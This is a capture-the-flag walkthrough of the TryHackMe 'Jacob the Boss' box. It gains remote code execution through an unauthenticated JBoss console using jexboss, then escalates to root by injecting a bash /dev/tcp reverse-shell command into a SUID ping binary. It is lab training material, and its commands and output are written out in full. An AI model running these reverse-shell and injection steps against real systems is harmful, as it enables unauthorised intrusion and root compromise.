TryHackMe Jacob the Box Walkthrough
Brief technical writeup explaining how we got a full access on Jacob the Boss machine from tryhackme
Target Informations
Externally accessible :- IP ADDRESS : 10.10.7.212- DOMAIN NAME : jacobtheboss.thm - jacobtheboss.box
DISCOVERY & RECONNAISSANCE
As the first step of this engagement, i’ll start with an nmap scan including default script and services version enumeration.
h4ck3r@local:~/jacobtheboss.thm$ nmap -v -sC -sV -oN nmap/nmap_tcp_simple 10.10.7.212Nmap scan report for jacobtheboss.thm (10.10.173.140)Host is up (0.096s latency).Not shown: 987 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey:| 2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)| 256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)|_ 256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)| http-methods:|_ Supported Methods: GET HEAD POST OPTIONS|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20|_http-title: My first blog111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind|_ 100000 3,4 111/udp6 rpcbind1090/tcp open java-rmi Java RMI|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)1098/tcp open java-rmi Java RMI1099/tcp open java-object Java Object Serialization| fingerprint-strings:| NULL:| java.rmi.MarshalledObject|| hash[| locBytest| objBytesq| http://jacobtheboss.box:8083/q| org.jnp.server.NamingServer_Stub| java.rmi.server.RemoteStub| java.rmi.server.RemoteObject| xpw;| UnicastRef2|_ jacobtheboss.box3306/tcp open mysql MariaDB (unauthorized)4444/tcp open java-rmi Java RMI4445/tcp open java-object Java Object Serialization4446/tcp open java-object Java Object Serialization8009/tcp open ajp13 Apache Jserv (Protocol v1.3)| ajp-methods:| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS| Potentially risky methods: PUT DELETE TRACE|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-favicon: Unknown favicon MD5: 799F70B71314A7508326D1D2F68F7519| http-methods:| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS|_ Potentially risky methods: PUT DELETE TRACE|_http-server-header: Apache-Coyote/1.1|_http-title: Welcome to JBoss™8083/tcp open http JBoss service httpd|_http-title: Site doesn't have a title (text/html).
Full ports scan up to 65515 is also a must.
h4ck3r@local:~/jacobtheboss.thm$ nmap -v -p- -T4 -oN nmap/nmap_tcp_full 10.10.7.212Nmap scan report for jacobtheboss.thm (10.10.173.140)Host is up (0.085s latency).Not shown: 65515 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind1090/tcp open ff-fms1098/tcp open rmiactivation1099/tcp open rmiregistry3306/tcp open mysql3873/tcp open fagordnc4444/tcp open krb5244445/tcp open upnotifyp4446/tcp open n1-fwp4457/tcp open prRegister4712/tcp open unknown4713/tcp open pulseaudio8009/tcp open ajp138080/tcp open http-proxy8083/tcp open us-srv36369/tcp open unknown38395/tcp open unknown47073/tcp open unknown
without any further enumeration the JBoss http service deployed on port 8083 Took my attention.
Validation & Exploitation
using the results of the reconnaissance as a starting point, and walking through the JBoss environment, we discovered that the JMX Console is beying deployed with no credentials. therefor we can upload and publish Web application ARchive (WAR) files remotely through this admin console, and compromize the network.
we selectively chosed jexboss tool to automate the Exploitation part.
h4ck3r@local:~/jacobtheboss.thm$ python ~/Tools/web_pentesting/jexboss/jexboss.py -host http://jacobtheboss.box:8080/** Checking Host: http://jacobtheboss.box:8080/ **[*] Checking admin-console: [ OK ][*] Checking Struts2: [ OK ][*] Checking Servlet Deserialization: [ OK ][*] Checking Application Deserialization: [ OK ][*] Checking Jenkins: [ OK ][*] Checking web-console: [ VULNERABLE ][*] Checking jmx-console: [ VULNERABLE ][*] Checking JMXInvokerServlet: [ VULNERABLE ]* Sending exploit code to http://jacobtheboss.box:8080/. Please wait...* Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.OBS: You can also use the --cmd "command" to send specific commands to run on the server.IP Address (RHOST): 10.9.123.226Port (RPORT): 9991
we successfully exploited the vulnerability in JBoss to get remote code execution and obtain a shell with user jacob privileges.
[jacob@jacobtheboss tmp]$ iduid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
Internal Enumeration
With an interactive access to the underlying OS on our target network, we continued with the examination of the system searching for ways to escalate privileges to the root level. We found a SUID file:
[jacob@jacobtheboss /]$ find / -perm -4000 -user root 2>/dev/null/usr/bin/pingsys <<---/usr/bin/fusermount/usr/bin/gpasswd/usr/bin/su/usr/bin/chfn/usr/bin/newgrp/usr/bin/chsh/usr/bin/sudo/usr/bin/mount/usr/bin/chage/usr/bin/umount/usr/bin/crontab/usr/bin/pkexec/usr/bin/passwd/usr/sbin/pam_timestamp_check/usr/sbin/unix_chkpwd/usr/sbin/usernetctl/usr/sbin/mount.nfs/usr/lib/polkit-1/polkit-agent-helper-1/usr/libexec/dbus-1/dbus-daemon-launch-helper
Transferring the binary file Locally for a further analysis.
[jacob@jacobtheboss /]$ scp /usr/bin/pingsys h4ck3r@10.9.123.226:/home/ h4ck3r /jacobtheboss.thm/files/pingsysReverse Engeneering the binary shows that its taking arguments from the user.
0x00400616 897ddc mov dword [var_24h], edi ; argc0x00400619 488975d0 mov qword [var_30h], rsi ; argv
and droping the user UID to 0 (root)
0x004006a5 bf00000000 mov edi, 00x004006aa e861feffff call sym.imp.setuid
Then passing those arguments into system() function for execution.
0x004006c3 488b45e0 mov rax, qword [var_20h]0x004006c7 4889c7 mov rdi, rax0x004006ca e8f1fdffff call sym.imp.system ; int system(const char *string)
we can conclude that the SUID Binary file is vulnerble to Command injection.
ROOT — Privilege escalation
we can easly spawn a reverse shell, by injecting our payload in the arguments.
[jacob@jacobtheboss /]$ /usr/bin/pingsys '127.0.0.1;/bin/bash -i > /dev/tcp/10.9.123.226/9991 0>&1 2>&1'PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.031 ms--- 127.0.0.1 ping statistics ---4 packets transmitted, 4 received, 0% packet loss, time 2999msrtt min/avg/max/mdev = 0.017/0.028/0.033/0.007 ms
And we successfully gained a root interactive shell on the compromised host.
h4ck3r@local:~/jacobtheboss.thm$ nc -vnlp 9991Ncat: Version 7.80 ( https://nmap.org/ncat )Ncat: Listening on :::9991Ncat: Listening on 0.0.0.0:9991Ncat: Connection from 10.10.9.96.Ncat: Connection from 10.10.9.96:36850.[root@jacobtheboss /]# iduid=0(root) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0[root@jacobtheboss /]# cat /root/root.txt29a5641e************************
